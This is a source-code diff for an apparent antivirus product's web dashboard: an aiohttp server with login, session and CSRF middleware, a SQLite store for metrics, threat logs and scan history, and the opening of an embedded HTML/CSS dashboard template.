@web.middleware
async def json_error_middleware(
request: web.Request,
handler,
) -> web.StreamResponse:
"""Catch unhandled exceptions and return JSON for API routes.
Without this, aiohttp's default error handler returns HTML error
pages, which break frontend ``fetch().json()`` calls.
"""
try:
return await handler(request)
except web.HTTPException as exc:
if request.path.startswith("/api/"):
return web.json_response(
{"error": exc.reason or "Request failed"},
status=exc.status,
)
raise
except Exception as exc:
logger.exception("Unhandled error on %s %s", request.method, request.path)
if request.path.startswith("/api/"):
return web.json_response(
{"error": f"Internal server error: {exc}"},
status=500,
)
return web.Response(
text="<h1>500 Internal Server Error</h1>",
status=500,
content_type="text/html",
)
# ------------------------------------------------------------------
# Rate limiting state
# ------------------------------------------------------------------
_action_timestamps: Dict[str, float] = {}
_RATE_LIMIT_SECONDS = 10
# ------------------------------------------------------------------
# Authentication middleware
# ------------------------------------------------------------------
@web.middleware
async def auth_middleware(
request: web.Request,
handler,
) -> web.StreamResponse:
"""Authenticate all requests.
* ``/login`` and ``/favicon.ico`` are always allowed.
* All other routes require a valid session cookie.
* Unauthenticated HTML routes serve the login page.
* Unauthenticated ``/api/*`` returns 401.
* POST ``/api/actions/*`` enforces CSRF and rate limiting.
"""
# Login route is always open.
if request.path in ("/login", "/favicon.ico"):
return await handler(request)
# All requests require auth (no localhost bypass — behind reverse proxy).
# Check session cookie.
session_token = request.app.get("_session_token", "")
cookie = request.cookies.get("ayn_session", "")
authenticated = (
cookie
and session_token
and secrets.compare_digest(cookie, session_token)
)
if not authenticated:
if request.path.startswith("/api/"):
return web.json_response(
{"error": "Unauthorized. Please login."}, status=401,
)
# Serve login page for HTML routes.
return web.Response(
text=request.app["_login_html"], content_type="text/html",
)
# CSRF + rate-limiting for POST action endpoints.
if request.method == "POST" and request.path.startswith("/api/actions/"):
origin = request.headers.get("Origin", "")
if origin:
parsed = urlparse(origin)
origin_host = parsed.hostname or ""
host = request.headers.get("Host", "")
expected = host.split(":")[0] if host else ""
allowed = {expected, "localhost", "127.0.0.1", "::1"}
allowed.discard("")
if origin_host not in allowed:
return web.json_response(
{"error": "CSRF: Origin mismatch"}, status=403,
)
now = time.time()
last = _action_timestamps.get(request.path, 0)
if now - last < _RATE_LIMIT_SECONDS:
return web.json_response(
{"error": "Rate limited. Try again in a few seconds."},
status=429,
)
_action_timestamps[request.path] = now
return await handler(request)
# ------------------------------------------------------------------
# Dashboard server
# ------------------------------------------------------------------
class DashboardServer:
"""AYN Antivirus dashboard with username/password authentication."""
def __init__(self, config: Optional[Config] = None) -> None:
self.config = config or Config()
self.store = DashboardStore(self.config.dashboard_db_path)
self.collector = MetricsCollector(self.store)
self.app = web.Application(middlewares=[json_error_middleware, auth_middleware])
self._session_token: str = secrets.token_urlsafe(32)
self._runner: Optional[web.AppRunner] = None
self._site: Optional[web.TCPSite] = None
self._setup()
# ------------------------------------------------------------------
# Setup
# ------------------------------------------------------------------
def _setup(self) -> None:
"""Configure the aiohttp application."""
self.app["_session_token"] = self._session_token
self.app["_login_html"] = self._build_login_page()
self.app["store"] = self.store
self.app["collector"] = self.collector
self.app["config"] = self.config
# Quarantine vault (best-effort).
try:
from ayn_antivirus.quarantine.vault import QuarantineVault
self.app["vault"] = QuarantineVault(
quarantine_dir=self.config.quarantine_path,
key_file_path=QUARANTINE_ENCRYPTION_KEY_FILE,
)
except Exception as exc:
logger.warning("Quarantine vault not available: %s", exc)
# API routes (``/api/*``).
setup_routes(self.app)
# HTML routes.
self.app.router.add_get("/", self._serve_dashboard)
self.app.router.add_get("/dashboard", self._serve_dashboard)
self.app.router.add_get("/login", self._serve_login)
self.app.router.add_post("/login", self._handle_login)
# Lifecycle hooks.
self.app.on_startup.append(self._on_startup)
self.app.on_shutdown.append(self._on_shutdown)
# ------------------------------------------------------------------
# Request handlers
# ------------------------------------------------------------------
async def _serve_login(self, request: web.Request) -> web.Response:
"""``GET /login`` — render the login page."""
return web.Response(
text=self.app["_login_html"], content_type="text/html",
)
async def _serve_dashboard(self, request: web.Request) -> web.Response:
"""``GET /`` or ``GET /dashboard`` — render the SPA.
The middleware already enforces auth for non-localhost, so if we
reach here the client is authenticated (or local).
"""
html = get_dashboard_html()
return web.Response(text=html, content_type="text/html")
async def _handle_login(self, request: web.Request) -> web.Response:
"""``POST /login`` — validate username/password, set session cookie."""
try:
body = await request.json()
username = body.get("username", "").strip()
password = body.get("password", "").strip()
except Exception:
return web.json_response({"error": "Invalid request"}, status=400)
if not username or not password:
return web.json_response(
{"error": "Username and password required"}, status=400,
)
valid_user = secrets.compare_digest(
username, self.config.dashboard_username,
)
valid_pass = secrets.compare_digest(
password, self.config.dashboard_password,
)
if not (valid_user and valid_pass):
self.store.log_activity(
f"Failed login attempt from {request.remote}: user={username}",
"WARNING",
"auth",
)
return web.json_response(
{"error": "Invalid username or password"}, status=401,
)
self.store.log_activity(
f"Successful login from {request.remote}: user={username}",
"INFO",
"auth",
)
response = web.json_response(
{"status": "ok", "message": "Welcome to AYN Antivirus"},
)
response.set_cookie(
"ayn_session",
self._session_token,
httponly=True,
max_age=86400,
samesite="Strict",
)
return response
# ------------------------------------------------------------------
# Login page
# ------------------------------------------------------------------
@staticmethod
def _build_login_page() -> str:
"""Return a polished HTML login form with username + password fields."""
return '''<!DOCTYPE html>
<html lang="en"><head>
<meta charset="UTF-8">
<meta name="viewport" content="width=device-width,initial-scale=1.0">
<title>AYN Antivirus \u2014 Login</title>
<style>
*{margin:0;padding:0;box-sizing:border-box}
body{background:#0a0e17;color:#e2e8f0;font-family:'Segoe UI',system-ui,-apple-system,sans-serif;
display:flex;justify-content:center;align-items:center;min-height:100vh;
background-image:radial-gradient(circle at 50% 50%,#111827 0%,#0a0e17 70%)}
.login-box{background:#111827;padding:2.5rem;border-radius:16px;border:1px solid #2a3444;
width:420px;max-width:90vw;box-shadow:0 25px 80px rgba(0,0,0,0.6)}
.logo{text-align:center;margin-bottom:2rem}
.logo .shield{font-size:3.5rem;display:block;margin-bottom:0.5rem}
.logo h1{font-size:1.8rem;background:linear-gradient(135deg,#3b82f6,#06b6d4);
-webkit-background-clip:text;-webkit-text-fill-color:transparent;font-weight:800}
.logo .subtitle{color:#6b7280;font-size:0.8rem;margin-top:0.3rem;letter-spacing:2px;text-transform:uppercase}
.field{margin-bottom:1.2rem}
.field label{display:block;font-size:0.75rem;color:#9ca3af;margin-bottom:0.4rem;
text-transform:uppercase;letter-spacing:1px;font-weight:600}
.field input{width:100%;padding:12px 16px;background:#0d1117;border:1px solid #2a3444;
color:#e2e8f0;border-radius:10px;font-size:15px;transition:all 0.2s;outline:none}
.field input:focus{border-color:#3b82f6;box-shadow:0 0 0 3px rgba(59,130,246,0.15)}
.field input::placeholder{color:#4b5563}
.btn{width:100%;padding:13px;background:linear-gradient(135deg,#3b82f6,#2563eb);color:white;
border:none;border-radius:10px;cursor:pointer;font-size:15px;font-weight:700;
transition:all 0.2s;margin-top:0.8rem;letter-spacing:0.5px}
.btn:hover{transform:translateY(-2px);box-shadow:0 8px 25px rgba(59,130,246,0.4)}
.btn:active{transform:translateY(0)}
.btn:disabled{opacity:0.5;cursor:not-allowed;transform:none}
.error{color:#fca5a5;font-size:0.85rem;text-align:center;margin-top:1rem;padding:10px 16px;
background:rgba(239,68,68,0.1);border-radius:8px;display:none;border:1px solid rgba(239,68,68,0.2)}
.footer{text-align:center;margin-top:2rem;padding-top:1.5rem;border-top:1px solid #1e293b}
.footer p{color:#4b5563;font-size:0.7rem;line-height:1.8}
.spinner{display:inline-block;width:16px;height:16px;border:2px solid #fff;
border-top-color:transparent;border-radius:50%;animation:spin 0.6s linear infinite;
vertical-align:middle;margin-right:8px}
@keyframes spin{to{transform:rotate(360deg)}}
</style></head>
<body>
<div class="login-box">
<div class="logo">
<span class="shield">\U0001f6e1\ufe0f</span>
<h1>AYN ANTIVIRUS</h1>
<div class="subtitle">Security Operations Dashboard</div>
</div>
<form id="loginForm" onsubmit="return doLogin()">
<div class="field">
<label>Username</label>
<input type="text" id="username" placeholder="Enter username" autocomplete="username" autofocus required>
</div>
<div class="field">
<label>Password</label>
<input type="password" id="password" placeholder="Enter password" autocomplete="current-password" required>
</div>
<button type="submit" class="btn" id="loginBtn">\U0001f510 Sign In</button>
</form>
<div class="error" id="errMsg">Invalid credentials</div>
<div class="footer">
<p>AYN Antivirus v1.0.0 \u2014 Server Protection Suite<br>
Secure Access Portal</p>
</div>
</div>
<script>
async function doLogin(){
var btn=document.getElementById('loginBtn');
var err=document.getElementById('errMsg');
var user=document.getElementById('username').value.trim();
var pass=document.getElementById('password').value;
if(!user||!pass)return false;
err.style.display='none';
btn.disabled=true;
btn.innerHTML='<span class="spinner"></span>Signing in...';
try{
var r=await fetch('/login',{method:'POST',
headers:{'Content-Type':'application/json'},
body:JSON.stringify({username:user,password:pass})});
if(r.ok){window.location.href='/dashboard';}
else{var d=await r.json();err.textContent=d.error||'Invalid credentials';err.style.display='block';}
}catch(e){err.textContent='Connection failed. Check server.';err.style.display='block';}
btn.disabled=false;btn.innerHTML='\\U0001f510 Sign In';
return false;
}
document.querySelectorAll('input').forEach(function(i){i.addEventListener('input',function(){
document.getElementById('errMsg').style.display='none';
});});
</script>
</body></html>'''
# ------------------------------------------------------------------
# Lifecycle hooks
# ------------------------------------------------------------------
async def _on_startup(self, app: web.Application) -> None:
await self.collector.start()
self.store.log_activity("Dashboard server started", "INFO", "server")
logger.info(
"Dashboard on http://%s:%d",
self.config.dashboard_host,
self.config.dashboard_port,
)
async def _on_shutdown(self, app: web.Application) -> None:
await self.collector.stop()
self.store.log_activity("Dashboard server stopped", "INFO", "server")
self.store.close()
# ------------------------------------------------------------------
# Blocking run
# ------------------------------------------------------------------
def run(self) -> None:
"""Run the dashboard server (blocking)."""
host = self.config.dashboard_host
port = self.config.dashboard_port
print(f"\n \U0001f6e1\ufe0f AYN Antivirus Dashboard")
print(f" \U0001f310 http://{host}:{port}")
print(f" \U0001f464 Username: {self.config.dashboard_username}")
print(f" \U0001f511 Password: {self.config.dashboard_password}")
print(f" Press Ctrl+C to stop\n")
web.run_app(self.app, host=host, port=port, print=None)
# ------------------------------------------------------------------
# Async start / stop (non-blocking)
# ------------------------------------------------------------------
async def start_async(self) -> None:
"""Start the server without blocking."""
self._runner = web.AppRunner(self.app)
await self._runner.setup()
self._site = web.TCPSite(
self._runner,
self.config.dashboard_host,
self.config.dashboard_port,
)
await self._site.start()
self.store.log_activity(
"Dashboard server started (async)", "INFO", "server",
)
async def stop_async(self) -> None:
"""Stop a server previously started with :meth:`start_async`."""
if self._site:
await self._site.stop()
if self._runner:
await self._runner.cleanup()
await self.collector.stop()
self.store.close()
# ------------------------------------------------------------------
# Convenience entry point
# ------------------------------------------------------------------
def run_dashboard(config: Optional[Config] = None) -> None:
"""Create a :class:`DashboardServer` and run it (blocking)."""
DashboardServer(config).run()

View File

@@ -0,0 +1,386 @@
"""Persistent storage for dashboard metrics, threat logs, and scan history."""
from __future__ import annotations
import json
import os
import sqlite3
import threading
from datetime import datetime, timedelta
from typing import Any, Dict, List, Optional
from ayn_antivirus.constants import (
DASHBOARD_MAX_THREATS_DISPLAY,
DASHBOARD_METRIC_RETENTION_HOURS,
DASHBOARD_SCAN_HISTORY_DAYS,
DEFAULT_DASHBOARD_DB_PATH,
)
class DashboardStore:
"""SQLite-backed store for all dashboard data.
Parameters
----------
db_path:
Path to the SQLite database file. Created automatically if it
does not exist.
"""
def __init__(self, db_path: str = DEFAULT_DASHBOARD_DB_PATH) -> None:
os.makedirs(os.path.dirname(db_path) or ".", exist_ok=True)
self.db_path = db_path
self._lock = threading.RLock()
self.conn = sqlite3.connect(db_path, check_same_thread=False)
self.conn.row_factory = sqlite3.Row
self.conn.execute("PRAGMA journal_mode=WAL")
self.conn.execute("PRAGMA synchronous=NORMAL")
self._create_tables()
# ------------------------------------------------------------------
# Schema
# ------------------------------------------------------------------
def _create_tables(self) -> None:
self.conn.executescript("""
CREATE TABLE IF NOT EXISTS metrics (
id INTEGER PRIMARY KEY AUTOINCREMENT,
timestamp TEXT NOT NULL DEFAULT (datetime('now')),
cpu_percent REAL DEFAULT 0,
mem_percent REAL DEFAULT 0,
mem_used INTEGER DEFAULT 0,
mem_total INTEGER DEFAULT 0,
disk_usage_json TEXT DEFAULT '[]',
load_avg_json TEXT DEFAULT '[]',
net_connections INTEGER DEFAULT 0
);
CREATE TABLE IF NOT EXISTS threat_log (
id INTEGER PRIMARY KEY AUTOINCREMENT,
timestamp TEXT NOT NULL DEFAULT (datetime('now')),
file_path TEXT,
threat_name TEXT NOT NULL,
threat_type TEXT NOT NULL,
severity TEXT NOT NULL,
detector TEXT,
file_hash TEXT,
action_taken TEXT DEFAULT 'detected',
details TEXT
);
CREATE TABLE IF NOT EXISTS scan_history (
id INTEGER PRIMARY KEY AUTOINCREMENT,
timestamp TEXT NOT NULL DEFAULT (datetime('now')),
scan_type TEXT NOT NULL,
scan_path TEXT,
files_scanned INTEGER DEFAULT 0,
files_skipped INTEGER DEFAULT 0,
threats_found INTEGER DEFAULT 0,
duration_seconds REAL DEFAULT 0,
status TEXT DEFAULT 'completed'
);
CREATE TABLE IF NOT EXISTS signature_updates (
id INTEGER PRIMARY KEY AUTOINCREMENT,
timestamp TEXT NOT NULL DEFAULT (datetime('now')),
feed_name TEXT NOT NULL,
hashes_added INTEGER DEFAULT 0,
ips_added INTEGER DEFAULT 0,
domains_added INTEGER DEFAULT 0,
urls_added INTEGER DEFAULT 0,
status TEXT DEFAULT 'success',
details TEXT
);
CREATE TABLE IF NOT EXISTS activity_log (
id INTEGER PRIMARY KEY AUTOINCREMENT,
timestamp TEXT NOT NULL DEFAULT (datetime('now')),
level TEXT NOT NULL DEFAULT 'INFO',
source TEXT,
message TEXT NOT NULL
);
CREATE INDEX IF NOT EXISTS idx_metrics_ts ON metrics(timestamp);
CREATE INDEX IF NOT EXISTS idx_threats_ts ON threat_log(timestamp);
CREATE INDEX IF NOT EXISTS idx_threats_severity ON threat_log(severity);
CREATE INDEX IF NOT EXISTS idx_scans_ts ON scan_history(timestamp);
CREATE INDEX IF NOT EXISTS idx_sigs_ts ON signature_updates(timestamp);
CREATE INDEX IF NOT EXISTS idx_activity_ts ON activity_log(timestamp);
""")
self.conn.commit()
# ------------------------------------------------------------------
# Metrics
# ------------------------------------------------------------------
def record_metric(
self,
cpu: float,
mem_pct: float,
mem_used: int,
mem_total: int,
disk_usage: list,
load_avg: list,
net_conns: int,
) -> None:
with self._lock:
self.conn.execute(
"INSERT INTO metrics "
"(cpu_percent, mem_percent, mem_used, mem_total, "
"disk_usage_json, load_avg_json, net_connections) "
"VALUES (?,?,?,?,?,?,?)",
(cpu, mem_pct, mem_used, mem_total,
json.dumps(disk_usage), json.dumps(load_avg), net_conns),
)
self.conn.commit()
def get_latest_metrics(self) -> Optional[Dict[str, Any]]:
with self._lock:
row = self.conn.execute(
"SELECT * FROM metrics ORDER BY id DESC LIMIT 1"
).fetchone()
if not row:
return None
d = dict(row)
d["disk_usage"] = json.loads(d.pop("disk_usage_json", "[]"))
d["load_avg"] = json.loads(d.pop("load_avg_json", "[]"))
return d
def get_metrics_history(self, hours: int = 1) -> List[Dict[str, Any]]:
cutoff = (datetime.utcnow() - timedelta(hours=hours)).strftime("%Y-%m-%d %H:%M:%S")
with self._lock:
rows = self.conn.execute(
"SELECT * FROM metrics WHERE timestamp >= ? ORDER BY timestamp",
(cutoff,),
).fetchall()
result: List[Dict[str, Any]] = []
for r in rows:
d = dict(r)
d["disk_usage"] = json.loads(d.pop("disk_usage_json", "[]"))
d["load_avg"] = json.loads(d.pop("load_avg_json", "[]"))
result.append(d)
return result
# ------------------------------------------------------------------
# Threats
# ------------------------------------------------------------------
def record_threat(
self,
file_path: str,
threat_name: str,
threat_type: str,
severity: str,
detector: str = "",
file_hash: str = "",
action: str = "detected",
details: str = "",
) -> None:
with self._lock:
self.conn.execute(
"INSERT INTO threat_log "
"(file_path, threat_name, threat_type, severity, "
"detector, file_hash, action_taken, details) "
"VALUES (?,?,?,?,?,?,?,?)",
(file_path, threat_name, threat_type, severity,
detector, file_hash, action, details),
)
self.conn.commit()
def get_recent_threats(
self, limit: int = DASHBOARD_MAX_THREATS_DISPLAY,
) -> List[Dict[str, Any]]:
with self._lock:
rows = self.conn.execute(
"SELECT * FROM threat_log ORDER BY id DESC LIMIT ?", (limit,)
).fetchall()
return [dict(r) for r in rows]
def get_threat_stats(self) -> Dict[str, Any]:
with self._lock:
total = self.conn.execute(
"SELECT COUNT(*) FROM threat_log"
).fetchone()[0]
by_severity: Dict[str, int] = {}
for row in self.conn.execute(
"SELECT severity, COUNT(*) as cnt FROM threat_log GROUP BY severity"
):
by_severity[row[0]] = row[1]
cutoff_24h = (datetime.utcnow() - timedelta(hours=24)).strftime("%Y-%m-%d %H:%M:%S")
cutoff_7d = (datetime.utcnow() - timedelta(days=7)).strftime("%Y-%m-%d %H:%M:%S")
last_24h = self.conn.execute(
"SELECT COUNT(*) FROM threat_log WHERE timestamp >= ?",
(cutoff_24h,),
).fetchone()[0]
last_7d = self.conn.execute(
"SELECT COUNT(*) FROM threat_log WHERE timestamp >= ?",
(cutoff_7d,),
).fetchone()[0]
return {
"total": total,
"by_severity": by_severity,
"last_24h": last_24h,
"last_7d": last_7d,
}
# ------------------------------------------------------------------
# Scans
# ------------------------------------------------------------------
def record_scan(
self,
scan_type: str,
scan_path: str,
files_scanned: int,
files_skipped: int,
threats_found: int,
duration: float,
status: str = "completed",
) -> None:
with self._lock:
self.conn.execute(
"INSERT INTO scan_history "
"(scan_type, scan_path, files_scanned, files_skipped, "
"threats_found, duration_seconds, status) "
"VALUES (?,?,?,?,?,?,?)",
(scan_type, scan_path, files_scanned, files_skipped,
threats_found, duration, status),
)
self.conn.commit()
def get_recent_scans(self, limit: int = 30) -> List[Dict[str, Any]]:
with self._lock:
rows = self.conn.execute(
"SELECT * FROM scan_history ORDER BY id DESC LIMIT ?", (limit,)
).fetchall()
return [dict(r) for r in rows]
def get_scan_chart_data(
self, days: int = DASHBOARD_SCAN_HISTORY_DAYS,
) -> List[Dict[str, Any]]:
cutoff = (datetime.utcnow() - timedelta(days=days)).strftime("%Y-%m-%d %H:%M:%S")
with self._lock:
rows = self.conn.execute(
"SELECT DATE(timestamp) as day, "
"COUNT(*) as scans, "
"SUM(threats_found) as threats, "
"SUM(files_scanned) as files "
"FROM scan_history WHERE timestamp >= ? "
"GROUP BY DATE(timestamp) ORDER BY day",
(cutoff,),
).fetchall()
return [dict(r) for r in rows]
# ------------------------------------------------------------------
# Signature Updates
# ------------------------------------------------------------------
def record_sig_update(
self,
feed_name: str,
hashes: int = 0,
ips: int = 0,
domains: int = 0,
urls: int = 0,
status: str = "success",
details: str = "",
) -> None:
with self._lock:
self.conn.execute(
"INSERT INTO signature_updates "
"(feed_name, hashes_added, ips_added, domains_added, "
"urls_added, status, details) "
"VALUES (?,?,?,?,?,?,?)",
(feed_name, hashes, ips, domains, urls, status, details),
)
self.conn.commit()
def get_recent_sig_updates(self, limit: int = 20) -> List[Dict[str, Any]]:
with self._lock:
rows = self.conn.execute(
"SELECT * FROM signature_updates ORDER BY id DESC LIMIT ?",
(limit,),
).fetchall()
return [dict(r) for r in rows]
def get_sig_stats(self) -> Dict[str, Any]:
"""Return signature stats from the actual signatures database."""
result = {
"total_hashes": 0,
"total_ips": 0,
"total_domains": 0,
"total_urls": 0,
"last_update": None,
}
# Try to read live counts from the signatures DB
sig_db_path = self.db_path.replace("dashboard.db", "signatures.db")
try:
import sqlite3 as _sql
sdb = _sql.connect(sig_db_path)
sdb.row_factory = _sql.Row
for tbl, key in [("threats", "total_hashes"), ("ioc_ips", "total_ips"),
("ioc_domains", "total_domains"), ("ioc_urls", "total_urls")]:
try:
result[key] = sdb.execute(f"SELECT COUNT(*) FROM {tbl}").fetchone()[0]
except Exception:
pass
try:
ts = sdb.execute("SELECT MAX(added_date) FROM threats").fetchone()[0]
result["last_update"] = ts
except Exception:
pass
sdb.close()
except Exception:
# Fallback to dashboard update log
with self._lock:
row = self.conn.execute(
"SELECT SUM(hashes_added), SUM(ips_added), "
"SUM(domains_added), SUM(urls_added) FROM signature_updates"
).fetchone()
result["total_hashes"] = row[0] or 0
result["total_ips"] = row[1] or 0
result["total_domains"] = row[2] or 0
result["total_urls"] = row[3] or 0
lu = self.conn.execute(
"SELECT MAX(timestamp) FROM signature_updates"
).fetchone()[0]
result["last_update"] = lu
return result
# ------------------------------------------------------------------
# Activity Log
# ------------------------------------------------------------------
def log_activity(
self,
message: str,
level: str = "INFO",
source: str = "system",
) -> None:
with self._lock:
self.conn.execute(
"INSERT INTO activity_log (level, source, message) VALUES (?,?,?)",
(level, source, message),
)
self.conn.commit()
def get_recent_logs(self, limit: int = 20) -> List[Dict[str, Any]]:
with self._lock:
rows = self.conn.execute(
"SELECT * FROM activity_log ORDER BY id DESC LIMIT ?", (limit,)
).fetchall()
return [dict(r) for r in rows]
# ------------------------------------------------------------------
# Cleanup
# ------------------------------------------------------------------
def cleanup_old_metrics(
self, hours: int = DASHBOARD_METRIC_RETENTION_HOURS,
) -> None:
cutoff = (datetime.utcnow() - timedelta(hours=hours)).strftime("%Y-%m-%d %H:%M:%S")
with self._lock:
self.conn.execute("DELETE FROM metrics WHERE timestamp < ?", (cutoff,))
self.conn.commit()
def close(self) -> None:
self.conn.close()

View File

@@ -0,0 +1,910 @@
"""AYN Antivirus Dashboard — HTML Template.
Single-page application with embedded CSS and JavaScript.
All data is fetched from the ``/api/*`` endpoints.
"""
from __future__ import annotations
def get_dashboard_html() -> str:
"""Return the complete HTML dashboard as a string."""
return _HTML
_HTML = r"""<!DOCTYPE html>
<html lang="en">
<head>
<meta charset="UTF-8">
<meta name="viewport" content="width=device-width,initial-scale=1.0">
<title>AYN Antivirus — Security Dashboard</title>
<style>
:root{--bg:#0a0e17;--surface:#111827;--surface2:#1a2332;--surface3:#1f2b3d;
--border:#2a3444;--text:#e2e8f0;--text-dim:#8892a4;--accent:#3b82f6;
--green:#10b981;--red:#ef4444;--orange:#f59e0b;--yellow:#eab308;
--purple:#8b5cf6;--cyan:#06b6d4;--radius:8px;--shadow:0 2px 8px rgba(0,0,0,.3)}
*{margin:0;padding:0;box-sizing:border-box}
body{background:var(--bg);color:var(--text);font-family:'Segoe UI',system-ui,-apple-system,sans-serif;font-size:14px;min-height:100vh}
a{color:var(--accent);text-decoration:none}
::-webkit-scrollbar{width:6px;height:6px}
::-webkit-scrollbar-track{background:var(--surface)}
::-webkit-scrollbar-thumb{background:var(--border);border-radius:3px}
/* ── Header ── */
.header{background:var(--surface);border-bottom:1px solid var(--border);padding:12px 24px;display:flex;align-items:center;justify-content:space-between;position:sticky;top:0;z-index:100}
.header-left{display:flex;align-items:center;gap:16px}
.logo{font-size:1.3rem;font-weight:800;letter-spacing:.05em}
.logo span{color:var(--accent)}
.header-meta{display:flex;gap:20px;font-size:.82rem;color:var(--text-dim)}
.header-meta b{color:var(--text);font-weight:600}
.pulse{display:inline-block;width:8px;height:8px;background:var(--green);border-radius:50%;margin-right:6px;animation:pulse 2s infinite}
@keyframes pulse{0%,100%{opacity:1}50%{opacity:.4}}
/* ── Navigation ── */
.nav{background:var(--surface);border-bottom:1px solid var(--border);padding:0 24px;display:flex;gap:0;overflow-x:auto}
.nav-tab{padding:12px 20px;cursor:pointer;color:var(--text-dim);font-weight:600;font-size:.85rem;border-bottom:2px solid transparent;transition:all .2s;white-space:nowrap;user-select:none}
.nav-tab:hover{color:var(--text);background:var(--surface2)}
.nav-tab.active{color:var(--accent);border-bottom-color:var(--accent)}
/* ── Layout ── */
.content{padding:20px 24px;max-width:1440px;margin:0 auto}
.tab-panel{display:none;animation:fadeIn .25s}
.tab-panel.active{display:block}
@keyframes fadeIn{from{opacity:0;transform:translateY(4px)}to{opacity:1;transform:none}}
.grid{display:grid;gap:16px}
.g2{grid-template-columns:repeat(2,1fr)}
.g3{grid-template-columns:repeat(3,1fr)}
.g4{grid-template-columns:repeat(4,1fr)}
.g6{grid-template-columns:repeat(6,1fr)}
@media(max-width:900px){.g2,.g3,.g4,.g6{grid-template-columns:1fr}}
@media(min-width:901px) and (max-width:1200px){.g4{grid-template-columns:repeat(2,1fr)}.g6{grid-template-columns:repeat(3,1fr)}}
.section{margin-bottom:24px}
.section-title{font-size:1rem;font-weight:700;margin-bottom:12px;display:flex;align-items:center;gap:8px}
.section-title .icon{font-size:1.1rem}
/* ── Cards ── */
.card{background:var(--surface);border:1px solid var(--border);border-radius:var(--radius);padding:16px;transition:border-color .2s,box-shadow .2s}
.card:hover{border-color:var(--accent);box-shadow:0 0 12px rgba(59,130,246,.1)}
.card-label{font-size:.75rem;color:var(--text-dim);text-transform:uppercase;letter-spacing:.06em;margin-bottom:6px}
.card-value{font-size:1.6rem;font-weight:700}
.card-sub{font-size:.78rem;color:var(--text-dim);margin-top:4px}
.card-green .card-value{color:var(--green)}
.card-red .card-value{color:var(--red)}
.card-orange .card-value{color:var(--orange)}
.card-yellow .card-value{color:var(--yellow)}
.card-accent .card-value{color:var(--accent)}
.card-purple .card-value{color:var(--purple)}
/* ── Gauge (SVG circular) ── */
.gauge-wrap{display:flex;flex-direction:column;align-items:center;padding:12px}
.gauge{position:relative;width:110px;height:110px}
.gauge svg{transform:rotate(-90deg)}
.gauge-bg{fill:none;stroke:var(--border);stroke-width:10}
.gauge-fill{fill:none;stroke-width:10;stroke-linecap:round;transition:stroke-dashoffset .8s ease}
.gauge-text{position:absolute;inset:0;display:flex;align-items:center;justify-content:center;font-size:1.3rem;font-weight:700}
.gauge-label{margin-top:8px;font-size:.8rem;color:var(--text-dim);font-weight:600}
/* ── Badges ── */
.badge{display:inline-block;padding:2px 8px;border-radius:4px;font-size:.72rem;font-weight:700;text-transform:uppercase;letter-spacing:.03em}
.badge-critical{background:rgba(239,68,68,.15);color:var(--red);border:1px solid var(--red)}
.badge-high{background:rgba(245,158,11,.15);color:var(--orange);border:1px solid var(--orange)}
.badge-medium{background:rgba(234,179,8,.15);color:var(--yellow);border:1px solid var(--yellow)}
.badge-low{background:rgba(16,185,129,.15);color:var(--green);border:1px solid var(--green)}
.badge-success{background:rgba(16,185,129,.15);color:var(--green);border:1px solid var(--green)}
.badge-error{background:rgba(239,68,68,.15);color:var(--red);border:1px solid var(--red)}
.badge-running{background:rgba(59,130,246,.15);color:var(--accent);border:1px solid var(--accent)}
.badge-info{background:rgba(59,130,246,.15);color:var(--accent);border:1px solid var(--accent)}
.badge-warning{background:rgba(245,158,11,.15);color:var(--orange);border:1px solid var(--orange)}
/* ── Tables ── */
.tbl-wrap{overflow-x:auto;border:1px solid var(--border);border-radius:var(--radius);background:var(--surface)}
table{width:100%;border-collapse:collapse}
th{background:var(--surface2);color:var(--text-dim);font-size:.75rem;text-transform:uppercase;letter-spacing:.05em;padding:10px 12px;text-align:left;position:sticky;top:0}
td{padding:9px 12px;border-top:1px solid var(--border);font-size:.84rem;vertical-align:middle}
tr:hover td{background:rgba(59,130,246,.04)}
.mono{font-family:'Cascadia Code','Fira Code',monospace;font-size:.78rem}
.trunc{max-width:260px;overflow:hidden;text-overflow:ellipsis;white-space:nowrap}
.empty-row td{text-align:center;padding:32px;color:var(--text-dim);font-size:.95rem}
/* ── Bar Chart (CSS) ── */
.bar-chart{display:flex;align-items:flex-end;gap:4px;height:120px;padding:8px 0}
.bar-col{display:flex;flex-direction:column;align-items:center;flex:1;min-width:0}
.bar{width:100%;min-height:2px;border-radius:3px 3px 0 0;transition:height .4s;position:relative;cursor:default}
.bar:hover::after{content:attr(data-tip);position:absolute;bottom:calc(100% + 4px);left:50%;transform:translateX(-50%);background:var(--surface3);border:1px solid var(--border);padding:3px 8px;border-radius:4px;font-size:.7rem;white-space:nowrap;z-index:5}
.bar-label{font-size:.6rem;color:var(--text-dim);margin-top:4px;writing-mode:vertical-lr;transform:rotate(180deg);max-height:40px;overflow:hidden}
.bar-threats{background:var(--red)}
.bar-scans{background:var(--accent)}
/* ── Disk bars ── */
.disk-row{display:flex;align-items:center;gap:12px;padding:6px 0}
.disk-mount{width:100px;font-size:.8rem;color:var(--text-dim);overflow:hidden;text-overflow:ellipsis;white-space:nowrap}
.disk-bar-outer{flex:1;height:14px;background:var(--surface2);border-radius:7px;overflow:hidden}
.disk-bar-inner{height:100%;border-radius:7px;transition:width .6s}
.disk-pct{width:50px;text-align:right;font-size:.8rem;font-weight:600}
/* ── Buttons ── */
.btn{display:inline-flex;align-items:center;gap:6px;padding:8px 16px;border-radius:6px;border:1px solid var(--border);background:var(--surface2);color:var(--text);font-size:.82rem;font-weight:600;cursor:pointer;transition:all .2s;white-space:nowrap}
.btn:hover{border-color:var(--accent);background:var(--surface3)}
.btn-primary{background:var(--accent);border-color:var(--accent);color:#fff}
.btn-primary:hover{background:#2563eb}
.btn-sm{padding:5px 10px;font-size:.76rem}
.btn:disabled{opacity:.5;cursor:not-allowed}
.spinner{display:inline-block;width:14px;height:14px;border:2px solid rgba(255,255,255,.3);border-top-color:#fff;border-radius:50%;animation:spin .6s linear infinite}
@keyframes spin{to{transform:rotate(360deg)}}
.btn-row{display:flex;gap:8px;flex-wrap:wrap;margin-bottom:12px}
/* ── Filter bar ── */
.filters{display:flex;gap:8px;flex-wrap:wrap;margin-bottom:14px;align-items:center}
.filters select,.filters input{background:var(--surface2);border:1px solid var(--border);color:var(--text);padding:7px 10px;border-radius:6px;font-size:.82rem}
.filters select:focus,.filters input:focus{outline:none;border-color:var(--accent)}
.filters input{min-width:200px}
/* ── Sub-tabs ── */
.sub-tabs{display:flex;gap:0;margin-bottom:14px;border-bottom:1px solid var(--border)}
